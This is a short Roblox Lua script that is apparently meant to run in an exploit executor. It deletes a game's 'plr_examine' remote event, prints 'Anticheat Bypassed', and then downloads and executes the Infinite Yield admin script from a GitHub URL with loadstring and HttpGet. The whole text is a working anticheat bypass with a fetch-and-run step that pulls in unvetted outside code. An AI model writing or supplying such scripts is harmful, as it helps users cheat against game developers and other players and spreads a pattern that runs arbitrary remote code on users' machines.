local ReplicatedStorage = game:GetService("ReplicatedStorage") local events = ReplicatedStorage:FindFirstChild("events") if events then local plrExamine = events:FindFirstChild("plr_examine") if plrExamine then plrExamine:Destroy() print("Anticheat Bypassed") loadstring(game:HttpGet("https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source"))() else warn("plr_examine does not exist.") end else warn("events folder not found in ReplicatedStorage.") end